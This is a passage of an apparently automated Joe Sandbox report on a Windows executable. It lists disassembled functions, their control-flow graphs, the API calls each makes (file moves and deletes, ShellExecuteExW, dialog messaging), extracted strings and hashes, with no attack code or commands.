                                                                                                                                                                          control_flow_graph 347 b3c73f-b3c757 call b3eb78 call b3ec50 352 b3d40d-b3d418 347->352 353 b3c75d-b3c787 call b3b314 347->353 353->352 356 b3c78d-b3c792 353->356 357 b3c793-b3c7a1 356->357 358 b3c7a2-b3c7b7 call b3af98 357->358 361 b3c7b9 358->361 362 b3c7bb-b3c7d0 call b31fbb 361->362 365 b3c7d2-b3c7d6 362->365 366 b3c7dd-b3c7e0 362->366 365->362 367 b3c7d8 365->367 368 b3c7e6 366->368 369 b3d3d9-b3d404 call b3b314 366->369 367->369 371 b3ca5f-b3ca61 368->371 372 b3c9be-b3c9c0 368->372 373 b3c7ed-b3c7f0 368->373 374 b3ca7c-b3ca7e 368->374 369->357 383 b3d40a-b3d40c 369->383 371->369 377 b3ca67-b3ca77 SetWindowTextW 371->377 372->369 379 b3c9c6-b3c9d2 372->379 373->369 375 b3c7f6-b3c850 call b3a64d call b2bdf3 call b2a544 call b2a67e call b26edb 373->375 374->369 378 b3ca84-b3ca8b 374->378 436 b3c98f-b3c9a4 call b2a5d1 375->436 377->369 378->369 384 b3ca91-b3caaa 378->384 380 b3c9e6-b3c9eb 379->380 381 b3c9d4-b3c9e5 call b47686 379->381 387 b3c9f5-b3ca00 call b3b48e 380->387 388 b3c9ed-b3c9f3 380->388 381->380 383->352 389 b3cab2-b3cac0 call b43e13 384->389 390 b3caac 384->390 394 b3ca05-b3ca07 387->394 388->394 389->369 401 b3cac6-b3cacf 389->401 390->389 399 b3ca12-b3ca32 call b43e13 call b43e3e 394->399 400 b3ca09-b3ca10 call b43e13 394->400 421 b3ca34-b3ca3b 399->421 422 b3ca4b-b3ca4d 399->422 400->399 405 b3cad1-b3cad5 401->405 406 b3caf8-b3cafb 401->406 410 b3cb01-b3cb04 405->410 411 b3cad7-b3cadf 405->411 406->410 413 b3cbe0-b3cbee call b30602 406->413 419 b3cb11-b3cb2c 410->419 420 b3cb06-b3cb0b 410->420 411->369 417 b3cae5-b3caf3 call b30602 411->417 429 b3cbf0-b3cc04 call b4279b 413->429 417->429 437 b3cb76-b3cb7d 419->437 438 b3cb2e-b3cb68 419->438 420->413 420->419 426 b3ca42-b3ca4a call b47686 421->426 427 b3ca3d-b3ca3f 421->427 422->369 428 b3ca53-b3ca5a call b43e2e 422->428 426->422 427->426 428->369 447 b3cc11-b3cc62 call b30602 call b3b1be GetDlgItem SetWindowTextW SendMessageW call b43e49 429->447 448 b3cc06-b3cc0a 429->448 453 b3c855-b3c869 SetFileAttributesW 436->453 454 b3c9aa-b3c9b9 call b2a55a 436->454 440 b3cbab-b3cbce call b43e13 * 2 437->440 441 b3cb7f-b3cb97 call b43e13 437->441 466 b3cb6a 438->466 467 b3cb6c-b3cb6e 438->467 440->429 474 b3cbd0-b3cbde call b305da 440->474 441->440 458 b3cb99-b3cba6 call b305da 441->458 481 b3cc67-b3cc6b 447->481 448->447 452 b3cc0c-b3cc0e 448->452 452->447 459 b3c90f-b3c91f GetFileAttributesW 453->459 460 b3c86f-b3c8a2 call b2b991 call b2b690 call b43e13 453->460 454->369 458->440 459->436 464 b3c921-b3c930 DeleteFileW 459->464 490 b3c8b5-b3c8c3 call b2bdb4 460->490 491 b3c8a4-b3c8b3 call b43e13 460->491 464->436 473 b3c932-b3c935 464->473 466->467 467->437 477 b3c939-b3c965 call b24092 GetFileAttributesW 473->477 474->429 488 b3c937-b3c938 477->488 489 b3c967-b3c97d MoveFileW 477->489 481->369 485 b3cc71-b3cc85 SendMessageW 481->485 485->369 488->477 489->436 492 b3c97f-b3c989 MoveFileExW 489->492 490->454 497 b3c8c9-b3c908 call b43e13 call b3fff0 490->497 491->490 491->497 492->436 497->459
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog.LIBCMT ref: 00B3C744
                                                                                                                                                                            • Part of subcall function 00B3B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00B3B3FB
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00B3CA0A
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00B3CA13
                                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 00B3CA71
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00B3CAB3
                                                                                                                                                                          • _wcsrchr.LIBVCRUNTIME ref: 00B3CBFB
                                                                                                                                                                          • GetDlgItem.USER32(?,00000066), ref: 00B3CC36
                                                                                                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 00B3CC46
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000143,00000000,00B6A472), ref: 00B3CC54
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00B3CC7F
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                                                                                                                                                          • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                                                                                                                          • API String ID: 2804936435-312220925
                                                                                                                                                                          • Opcode ID: 849922bf998b39d45b9a50b79f9283c34cc857a671b62782cced4e4deced8fc4
                                                                                                                                                                          • Instruction ID: 16815e421ae9cdebe9a04af3a8e5712a384e32713ed38f817cff9c9bafc05d03
                                                                                                                                                                          • Opcode Fuzzy Hash: 849922bf998b39d45b9a50b79f9283c34cc857a671b62782cced4e4deced8fc4
                                                                                                                                                                          • Instruction Fuzzy Hash: D7E150B2900218AADB25DBA0DC85EEE77FCEB04750F1441E6F649E7050EF749F848B64
                                                                                                                                                                          Function 00B2DA67 Relevance: 23.4, APIs: 4, Strings: 9, Instructions: 663COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog.LIBCMT ref: 00B2DA70
                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00B2DAAC
                                                                                                                                                                            • Part of subcall function 00B2C29A: _wcslen.LIBCMT ref: 00B2C2A2
                                                                                                                                                                            • Part of subcall function 00B305DA: _wcslen.LIBCMT ref: 00B305E0
                                                                                                                                                                            • Part of subcall function 00B31B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00B2BAE9,00000000,?,?,?,0001046A), ref: 00B31BA0
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00B2DDE9
                                                                                                                                                                          • __fprintf_l.LIBCMT ref: 00B2DF1C
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
                                                                                                                                                                          • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                                                                                                                                                          • API String ID: 566448164-801612888
                                                                                                                                                                          • Opcode ID: a1d32f9840f78b47afd98d35e099590edbeab03255a878213f3355034fa6a331
                                                                                                                                                                          • Instruction ID: 974ad88602972fc01dfda2bba30981ce9ea595c848b3218ffdef36a7958571f5
                                                                                                                                                                          • Opcode Fuzzy Hash: a1d32f9840f78b47afd98d35e099590edbeab03255a878213f3355034fa6a331
                                                                                                                                                                          • Instruction Fuzzy Hash: EB32D271900228DBDF24EF68E842BEE77E5EF18700F4005AAF91AA7291E771DD85CB50
                                                                                                                                                                          Function 00B3D4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00B3B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B3B579
                                                                                                                                                                            • Part of subcall function 00B3B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B3B58A
                                                                                                                                                                            • Part of subcall function 00B3B568: IsDialogMessageW.USER32(0001046A,?), ref: 00B3B59E
                                                                                                                                                                            • Part of subcall function 00B3B568: TranslateMessage.USER32(?), ref: 00B3B5AC
                                                                                                                                                                            • Part of subcall function 00B3B568: DispatchMessageW.USER32(?), ref: 00B3B5B6
                                                                                                                                                                          • GetDlgItem.USER32(00000068,00B7FCB8), ref: 00B3D4E8
                                                                                                                                                                          • ShowWindow.USER32(00000000,00000005,?,?,?,00B3AF07,00000001,?,?,00B3B7B9,00B5506C,00B7FCB8,00B7FCB8,00001000,00000000,00000000), ref: 00B3D510
                                                                                                                                                                          • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00B3D51B
                                                                                                                                                                          • SendMessageW.USER32(00000000,000000C2,00000000,00B535F4), ref: 00B3D529
                                                                                                                                                                          • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00B3D53F
                                                                                                                                                                          • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00B3D559
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00B3D59D
                                                                                                                                                                          • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00B3D5AB
                                                                                                                                                                          • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00B3D5BA
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00B3D5E1
                                                                                                                                                                          • SendMessageW.USER32(00000000,000000C2,00000000,00B543F4), ref: 00B3D5F0
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                                                                                                          • String ID: \
                                                                                                                                                                          • API String ID: 3569833718-2967466578
                                                                                                                                                                          • Opcode ID: 31cf4bf605bb0f75de6df1f3ee0fc856d4bb461ae836bff77d7e1a26a0d8e426
                                                                                                                                                                          • Instruction ID: fe2055bc5365b238a3204efb154fdddf43743f4dca11648c525ecc65c54c0c6f
                                                                                                                                                                          • Opcode Fuzzy Hash: 31cf4bf605bb0f75de6df1f3ee0fc856d4bb461ae836bff77d7e1a26a0d8e426
                                                                                                                                                                          • Instruction Fuzzy Hash: 71318D71145742ABE301DB20AC4AFAB7BECEB96B05F000518F651972E0EF669A08C776
                                                                                                                                                                          Function 00B3D78F Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 184COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 836 b3d78f-b3d7a7 call b3ec50 839 b3d9e8-b3d9f0 836->839 840 b3d7ad-b3d7b9 call b43e13 836->840 840->839 843 b3d7bf-b3d7e7 call b3fff0 840->843 846 b3d7f1-b3d7ff 843->846 847 b3d7e9 843->847 848 b3d812-b3d818 846->848 849 b3d801-b3d804 846->849 847->846 851 b3d85b-b3d85e 848->851 850 b3d808-b3d80e 849->850 852 b3d810 850->852 853 b3d837-b3d844 850->853 851->850 854 b3d860-b3d866 851->854 855 b3d822-b3d82c 852->855 856 b3d9c0-b3d9c2 853->856 857 b3d84a-b3d84e 853->857 858 b3d868-b3d86b 854->858 859 b3d86d-b3d86f 854->859 862 b3d81a-b3d820 855->862 863 b3d82e 855->863 864 b3d9c6 856->864 857->864 865 b3d854-b3d859 857->865 858->859 860 b3d882-b3d898 call b2b92d 858->860 859->860 861 b3d871-b3d878 859->861 871 b3d8b1-b3d8bc call b2a231 860->871 872 b3d89a-b3d8a7 call b31fbb 860->872 861->860 866 b3d87a 861->866 862->855 868 b3d830-b3d833 862->868 863->853 870 b3d9cf 864->870 865->851 866->860 868->853 873 b3d9d6-b3d9d8 870->873 882 b3d8d9-b3d8e6 ShellExecuteExW 871->882 883 b3d8be-b3d8d5 call b2b6c4 871->883 872->871 881 b3d8a9 872->881 874 b3d9e7 873->874 875 b3d9da-b3d9dc 873->875 874->839 875->874 878 b3d9de-b3d9e1 ShowWindow 875->878 878->874 881->871 882->874 884 b3d8ec-b3d8f9 882->884 883->882 886 b3d8fb-b3d902 884->886 887 b3d90c-b3d90e 884->887 886->887 889 b3d904-b3d90a 886->889 890 b3d910-b3d919 887->890 891 b3d925-b3d944 call b3dc3b 887->891 889->887 892 b3d97b-b3d987 CloseHandle 889->892 890->891 899 b3d91b-b3d923 ShowWindow 890->899 891->892 905 b3d946-b3d94e 891->905 893 b3d989-b3d996 call b31fbb 892->893 894 b3d998-b3d9a6 892->894 893->870 893->894 894->873 898 b3d9a8-b3d9aa 894->898 898->873 902 b3d9ac-b3d9b2 898->902 899->891 902->873 904 b3d9b4-b3d9be 902->904 904->873 905->892 906 b3d950-b3d961 GetExitCodeProcess 905->906 906->892 907 b3d963-b3d96d 906->907 908 b3d974 907->908 909 b3d96f 907->909 908->892 909->908
                                                                                                                                                                          APIs
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00B3D7AE
                                                                                                                                                                          • ShellExecuteExW.SHELL32(?), ref: 00B3D8DE
                                                                                                                                                                          • ShowWindow.USER32(?,00000000), ref: 00B3D91D
                                                                                                                                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00B3D959
                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00B3D97F
                                                                                                                                                                          • ShowWindow.USER32(?,00000001), ref: 00B3D9E1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                                                                                                                                          • String ID: .exe$.inf
                                                                                                                                                                          • API String ID: 36480843-3750412487
                                                                                                                                                                          • Opcode ID: a329232928dc075a323e2f0734b8b447d29ede54badc68e756731df4e4b183d4
                                                                                                                                                                          • Instruction ID: cc2777f00e8ef38d148a511f11e77b35a26eabff06be8b185220415bce1c255c
                                                                                                                                                                          • Opcode Fuzzy Hash: a329232928dc075a323e2f0734b8b447d29ede54badc68e756731df4e4b183d4
                                                                                                                                                                          • Instruction Fuzzy Hash: 4951E9745083809AD7319F24F844BAB7BE4EF41B44F2409DEF5C5972A1DB719988C752
                                                                                                                                                                          Function 00B4A95B Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 910 b4a95b-b4a974 911 b4a976-b4a986 call b4ef4c 910->911 912 b4a98a-b4a98f 910->912 911->912 919 b4a988 911->919 914 b4a991-b4a999 912->914 915 b4a99c-b4a9c0 MultiByteToWideChar 912->915 914->915 917 b4a9c6-b4a9d2 915->917 918 b4ab53-b4ab66 call b3fbbc 915->918 920 b4a9d4-b4a9e5 917->920 921 b4aa26 917->921 919->912 924 b4aa04-b4aa15 call b48e06 920->924 925 b4a9e7-b4a9f6 call b52010 920->925 923 b4aa28-b4aa2a 921->923 928 b4aa30-b4aa43 MultiByteToWideChar 923->928 929 b4ab48 923->929 924->929 935 b4aa1b 924->935 925->929 938 b4a9fc-b4aa02 925->938 928->929 932 b4aa49-b4aa5b call b4af6c 928->932 933 b4ab4a-b4ab51 call b4abc3 929->933 940 b4aa60-b4aa64 932->940 933->918 939 b4aa21-b4aa24 935->939 938->939 939->923 940->929 942 b4aa6a-b4aa71 940->942 943 b4aa73-b4aa78 942->943 944 b4aaab-b4aab7 942->944 943->933 947 b4aa7e-b4aa80 943->947 945 b4ab03 944->945 946 b4aab9-b4aaca 944->946 950 b4ab05-b4ab07 945->950 948 b4aae5-b4aaf6 call b48e06 946->948 949 b4aacc-b4aadb call b52010 946->949 947->929 951 b4aa86-b4aaa0 call b4af6c 947->951 954 b4ab41-b4ab47 call b4abc3 948->954 966 b4aaf8 948->966 949->954 964 b4aadd-b4aae3 949->964 950->954 955 b4ab09-b4ab22 call b4af6c 950->955 951->933 963 b4aaa6 951->963 954->929 955->954 967 b4ab24-b4ab2b 955->967 963->929 968 b4aafe-b4ab01 964->968 966->968 969 b4ab67-b4ab6d 967->969 970 b4ab2d-b4ab2e 967->970 968->950 971 b4ab2f-b4ab3f WideCharToMultiByte 969->971 970->971 971->954 972 b4ab6f-b4ab76 call b4abc3 971->972 972->933
                                                                                                                                                                          APIs
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00B45695,00B45695,?,?,?,00B4ABAC,00000001,00000001,2DE85006), ref: 00B4A9B5
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00B4ABAC,00000001,00000001,2DE85006,?,?,?), ref: 00B4AA3B
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00B4AB35
                                                                                                                                                                          • __freea.LIBCMT ref: 00B4AB42
                                                                                                                                                                            • Part of subcall function 00B48E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00B4CA2C,00000000,?,00B46CBE,?,00000008,?,00B491E0,?,?,?), ref: 00B48E38
                                                                                                                                                                          • __freea.LIBCMT ref: 00B4AB4B
                                                                                                                                                                          • __freea.LIBCMT ref: 00B4AB70
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1414292761-0
                                                                                                                                                                          • Opcode ID: fbc23780e33368c8a4e5cff156a1ab8a5a672f60226a2651b2be8071ecb95b47
                                                                                                                                                                          • Instruction ID: 8b093685a4a09958f14b9e0217bda74065e0ab937be5e7ee1e094b8ab1fda79c
                                                                                                                                                                          • Opcode Fuzzy Hash: fbc23780e33368c8a4e5cff156a1ab8a5a672f60226a2651b2be8071ecb95b47
                                                                                                                                                                          • Instruction Fuzzy Hash: 0451B172650226ABDB258F64CC81EBFB7EAEB44750F1546A9FC04E6140EB34DE40E692
                                                                                                                                                                          Function 00B43B72 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 975 b43b72-b43b7c 976 b43bee-b43bf1 975->976 977 b43bf3 976->977 978 b43b7e-b43b8c 976->978 979 b43bf5-b43bf9 977->979 980 b43b95-b43bb1 LoadLibraryExW 978->980 981 b43b8e-b43b91 978->981 982 b43bb3-b43bbc GetLastError 980->982 983 b43bfa-b43c00 980->983 984 b43b93 981->984 985 b43c09-b43c0b 981->985 987 b43be6-b43be9 982->987 988 b43bbe-b43bd3 call b46088 982->988 983->985 989 b43c02-b43c03 FreeLibrary 983->989 986 b43beb 984->986 985->979 986->976 987->986 988->987 992 b43bd5-b43be4 LoadLibraryExW 988->992 989->985 992->983 992->987
                                                                                                                                                                          APIs
                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,00B43C35,?,?,00B82088,00000000,?,00B43D60,00000004,InitializeCriticalSectionEx,00B56394,InitializeCriticalSectionEx,00000000), ref: 00B43C03
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                          • String ID: api-ms-
                                                                                                                                                                          • API String ID: 3664257935-2084034818
                                                                                                                                                                          • Opcode ID: 21aa449eb23259db218d4486a6160321fd17e2816701e77670aa5be0f7ffb5a6
                                                                                                                                                                          • Instruction ID: e36cc33d8d5345a5c18660ed9847db10a9518150e985fa4a9516076948f8f135
                                                                                                                                                                          • Opcode Fuzzy Hash: 21aa449eb23259db218d4486a6160321fd17e2816701e77670aa5be0f7ffb5a6
                                                                                                                                                                          • Instruction Fuzzy Hash: BF11CA31A45721ABDB228B589C8175977E4DF01FB1F2901D0E915FB2D0E771EF0096D1
                                                                                                                                                                          Function 00B3AC16 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34comCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00B3081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00B30836
                                                                                                                                                                            • Part of subcall function 00B3081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00B2F2D8,Crypt32.dll,00000000,00B2F35C,?,?,00B2F33E,?,?,?), ref: 00B30858
                                                                                                                                                                          • OleInitialize.OLE32(00000000), ref: 00B3AC2F
                                                                                                                                                                          • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00B3AC66
                                                                                                                                                                          • SHGetMalloc.SHELL32(00B68438), ref: 00B3AC70
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                                                                                                          • String ID: riched20.dll$3Ro
                                                                                                                                                                          • API String ID: 3498096277-3613677438
                                                                                                                                                                          • Opcode ID: 98bbde7d84c645d41726725142b12c05455c72ec028e3e1969916f64c39ab7ee
                                                                                                                                                                          • Instruction ID: c0b51dca1f27899389c9ce319f595f0a42ec7ec485a2fd023120952cf268c4a5
                                                                                                                                                                          • Opcode Fuzzy Hash: 98bbde7d84c645d41726725142b12c05455c72ec028e3e1969916f64c39ab7ee
                                                                                                                                                                          • Instruction Fuzzy Hash: 3BF0FFB1900209ABCB10AFA9D849A9FFBFCEF84B04F104156A815E2251DBB45645CBA1
                                                                                                                                                                          Function 00B298E0 Relevance: 7.6, APIs: 5, Instructions: 111filetimeCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
